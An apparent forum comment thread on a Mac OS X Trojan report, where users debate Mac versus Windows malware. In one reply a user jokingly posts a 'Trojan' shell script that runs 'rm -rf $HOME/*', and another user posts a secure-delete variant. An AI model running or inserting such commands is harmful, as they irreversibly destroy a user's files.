Security firm details new Trojan written for Apple's Mac OS X

24

Comments

  • Reply 21 of 79
    macrulezmacrulez Posts: 2,455member
    deleted
  • Reply 22 of 79
    Quote:



    You did a Google search so it must be infallibly accurate.



    Funny how when you replace ?OS? (which is a part of Mac OS X) for operating system the results dramatically change. If I wasn?t familiar with your posting history I?d think you were purposely trying to fudge the results.



    http://www.google.com/search?q=most+...erating+system
  • Reply 23 of 79
    Quote:
    Originally Posted by AdonisSMU View Post


    AT 5 or 10% market share, it's just not worth it.



    Actually Apple has had *over* 25% of the consumer market share for a couple of years now, and it's the juicy top portion of the market. If you add in iOS devices, Apple runs the two most popular consumer computing platforms on the planet right now.



    The meme that Apple needs to "get popular" so as to present "a worthwhile target for hackers," (which will inevitably enable a flood of malware), has been clearly wrong for years now, even though tired journalists still keep dragging it out.



    Facts like this rarely get in the way of popular opinion though.
  • Reply 24 of 79
    Quote:
    Originally Posted by Prof. Peabody View Post


    Actually Apple has had *over* 25% of the consumer market share for a couple of years now, and it's the juicy top portion of the market. If you add in iOS devices, Apple runs the two most popular consumer computing platforms on the planet right now.



    Let?s not forget the >90% marketshare for consumer PCs costing >$1000.
  • Reply 25 of 79
    The phishing problem is a pain in the butt.



    Patching vulnerabilities is one thing, but trying to prevent users from voluntarily giving up their passwords or installing a virus/trogen is a whole other game.



    Forcing applications to be installed from a curated store is one option but is a bit heavy handed. Maybe having the default credentials only allow signed applications to run would be an acceptable compromise.
  • Reply 26 of 79
    Quote:



    That first link in the results for your query nicely show how retarded statements like 'the most dangerous OS is [..]' actually are. The only argument put forward in that 'article' is that OS X has longer patch cycles, and as such it is the 'most dangerous OS'. If there are no security holes that are actively exploited, no signs of anyone with OS getting pwned, and no published, unpatched zero-day exploits know, what difference does it make how long it takes before OS X gets another update? A much more interesting figure would be 'mean time between zero-day exploit and patch', but the 'article' conveniently skips over that and instead makes a sensationalist headline out of nothing.



    Meanwhile, in my active life of using all kinds of operating systems (which is over 2 decades and includes every version of Windows since 3.11, many different Linux distributions, a number of other Unix OS's) and Macs since OS X 10.4, I have seen 1 (one) Linux server with a rootkit (at work), not a single OS X machine with a virus (and I've seen a lot of them, many of my friends and colleagues use macs), yet so many Windows computers with malware, spyware and viruses that I don't even know how many there were. Even the ones with antivirus software (which in my opinion is almost a scam) attract all kinds of bad things.



    From a practical point of view, I think that you can safely say Windows is the most dangerous OS, especially pre-SP2 Windows XP. I don't care about any excuses about marketshare or theoretical exploitability, just measured facts about exploits, and in that aspect, OS X is rock solid.
  • Reply 27 of 79
    Having used Macs constantly since '86 in hundreds of environments, the only virus I ever came across was nVIR.



    It didn't do anything malicious except copy itself. MacTech then released a simple program in C to "vaccinate" it.



    Windows on the other hand...
  • Reply 28 of 79
    Quote:
    Originally Posted by Logisticaldron View Post


    Which is odd because before Mac OS X Apple sold less Macs and had a smaller marketshare and yet still managed to have more viruses written for it.



    I wonder if I should abandon System 6 and try that new System 7 that all the kids are raving about...



  • Reply 29 of 79
    clearly OSX is just a wide open free for all where hackers can gain social security and credit card numbers, and nude photos of your wife!
  • Reply 30 of 79
    mr. hmr. h Posts: 4,841member
    Quote:
    Originally Posted by d-range View Post


    Great, wake me up when a real virus for OS X is developed, one that doesn't require me to manually install and run itself first. No operating system will ever be immune to Trojans, unless you lock it down so tight the user cannot install or run _anything_ without some trusted third-party approving it.



    I've written a Trojan myself, it's very destructive, cross platform on many Unix systems. It will wipe out all your files, and it would be very trivial to have it mail them to me or post them somewhere on the internet as well, but I didn't feel like modifying it for that yet. As a service to all security researchers I'll post the code here, it's called 'please_run_me_to_make_money.sh'



    Code:


    #!/bin/sh



    rm -rf $HOME/*



    echo "U R fscked!"







    Don't tell anyone I wrote it!



    Excellent. Here's an improvement for you:



    Code:


    #!/bin/sh



    srm -srf $HOME/*



    echo "U R _really_ fscked!"



  • Reply 31 of 79
    Quote:
    Originally Posted by Logisticaldron View Post


    Let?s not forget the >90% marketshare for consumer PCs costing >$1000.



    Exactly. The idea that Apple and Macs haven't been a rather juicy target for a long time now is just false.



    That being said however, one reason we might not see viruses on the Mac in the future is that it might be easier, and get more results to use Trojans.



    Another uncomfortable fact is that the general population has been getting stupider year by year for about 30 years now, and we are no where near the peak of the phenomenon. Education rates have plummeted, the quality of education has plummeted, average IQ scores have plummeted, etc., etc. So it might actually be more efficient, and get you a bigger bang for your buck to go after the human fallibility factor (the stupids), instead of pitching your wits against a hardened Unix system.



    If I was a virus writer I would have switched to writing Trojans a long time ago for this very reason.



    Maybe this is why Macs never seem to get targeted. All the "easy meat" was taken a long time ago and the average hacker writing viruses is just not up to the incredibly complex work of breaking into a system that has any real protections applied.



    Lazyness + Stupidity = Trojans more profitable than Viruses.
  • Reply 32 of 79
    I have always been curious about malware for OSX. Are malware architecturally specific? Will a PPC Mac be as vulnerable as an Intel Mac? I am asking because it seems like it took so long for someone to finally get windows to run on a Mac. Meaning to design a malware for a Mac must just be as difficult. Does that mean that it is even more difficult for a PPC Mac? I am not sure if my reasoning is valid maybe a little confusing.
  • Reply 33 of 79
    nagrommenagromme Posts: 2,834member
    Quote:
    Originally Posted by MacApple21 View Post


    Not the loads of viruses which medias and Apple-haters have been foreseeing for years, but the medias' claim about OS X no longer being ANY better than Windows when it comes to security



    These stories come out every so often?and then are forgotten. (A Trojan is simply a lie, and no OS is immune.)



    Remember when the first successful real-world self-spreading Internet virus/worm came out? Me neither?but I know that headline has appeared in the media at least twice since OS X came out. False alarms. And it MAY happen for real one day, but it never has yet.
  • Reply 34 of 79
    The head count doesn't tell the whole story.



    Arithmetically? Maybe. (you have more homework to do, see the postscript)

    Practically? No.



    For what it's worth, I managed a couple of academic locations with 4:1 ratio of mac:win in the days of Mac OS9 and Win98, for several years up until X and XP arrived.



    Actual headaches on Windows boxes? Constant drumbeat.

    Actual headaches on Macs in that time? Unremarkable.



    I'm trying to remember even a single incident that caused us to move the Mac OS9 students to the Win98 machines thanks to a midday rdist drill like we would have to do on the PCs in advance of some new AV def file release, and I can't. I think would have remembered moving 16 Mac users to 4 PCs.



    Malware on arithmetic level may have been a few more in numbers but was not "much worse" on a practical level.



    P.S. Your "MacOS" search also includes MacOS X malware like this one:



    http://www.mcafee.com/threat-intelli...aspx?id=146310



    And this one which "does not affect MacOS" but does give examples on Win 98 infection:



    http://www.mcafee.com/threat-intelli....aspx?id=99728



    And things like this 2011 vintage:



    http://www.mcafee.com/threat-intelli...aspx?id=362665



    And this:



    http://www.mcafee.com/threat-intelli...aspx?id=130506



    Which I'm pretty sure was not an issue on OS9.
  • Reply 35 of 79
    mr. hmr. h Posts: 4,841member
    Quote:
    Originally Posted by Umibuta View Post


    I have always been curious about malware for OSX. Are malware architecturally specific? Will a PPC Mac be as vulnerable as an Intel Mac? I am asking because it seems like it took so long for someone to finally get windows to run on a Mac. Meaning to design a malware for a Mac must just be as difficult. Does that mean that it is even more difficult for a PPC Mac? I am not sure if my reasoning is valid maybe a little confusing.



    Malware is still a program, just one that does unpleasant things.



    On a simple level, programs can be script-based or compiled. Script-based programs are interpreted by the operating system at run-time and will work on any architecture as long as it's running the correct OS (i.e. a Unix script won't run on Windows but it will probably run on any OS X machine, regardless of the Mac being PPC or Intel).



    A compiled program is translated from the human-readable source code to "machine code" at compile time, and distributed in this "machine code" format. Machine code differs from one architecture to another - PPC machine code is different from Intel machine code. A machine of the right architecture can read the file and performs the tasks instructed, with the help of the operating system. A compiled program therefore needs the correct architecture and operating system in order to run. Note that it's possible to compile a Mac program to contain both PPC and Intel machine code, and therefore run on any Mac with the correct operating system.
  • Reply 36 of 79
    There have already been a few Trojans for Mac OS X. This is nothing new. But since they require the user to actually install it & are so few in number, who cares? I could probably write a Trojan in Java to get users' passwords with my 5-weeks experience with the language. Just make an app that shows a pop up asking for the password! But until there's a self-installing Virus, who cares?
  • Reply 37 of 79
    Another 'attack' that you have to purposely do to yourself. Yawn.



    I have a bottled water sitting here. Since it would kill my MBP if I poured it on it, should we label bottled water as a threat to OS X?
  • Reply 38 of 79
    Eh.....
  • Reply 39 of 79
    maltzmaltz Posts: 350member
    Quote:
    Originally Posted by d-range View Post


    Care to point out what part of that is 'simply not true'?



    Edit: I'll help you out, before you waste your time:



    Here's 4 quick searches in the McAfee antivirus database:



    1) 16-bit Windows (what I was referring to when I said MacOS was 'much worse than Windows at that time'):



    http://www.mcafee.com/apps/search/th...=W16&v=malware : 38 threats



    2) MacOS (prior to OS X):



    http://www.mcafee.com/apps/search/th...acOS&v=malware : 86 threats



    3) OS X:



    http://www.mcafee.com/apps/search/th...=OSX&v=malware : 51 threats



    4) 32-bit Windows (just for laughs):



    http://www.mcafee.com/apps/search/th...=W32&v=malware : 1000 threats, but the database clipped the results at 100 pages





    The part about the Mac OS 9 having more malware than Windows is the bit that's simply not true. You forgot to include the 1000+ DOS viruses that Win16 was also susceptible to in #1. Clearly, you weren't involved with computers during that time period. lol I'll give you the benefit of the doubt for now and assume you're just badly misinformed and not trolling.
  • Reply 40 of 79
    Quote:
    Originally Posted by Logisticaldron View Post




    Apolgies to Charles Darwin ?On the Origin of Species?, too. Our smartest keep protecting the dumbest and weakest, thus weakening the species.



    Actually, you're, in my humble opinion, making a mistake here. Our species is weakening specialization, not itself. Therefore, it becomes less efficient at its core tasks (whichever these might be), but the silver lining of the cloud is, you are more adaptable. Maybe suck "morons" are stronger or more artistic minded, or whatever... Preserving diversity is important to an advanced species.
Sign In or Register to comment.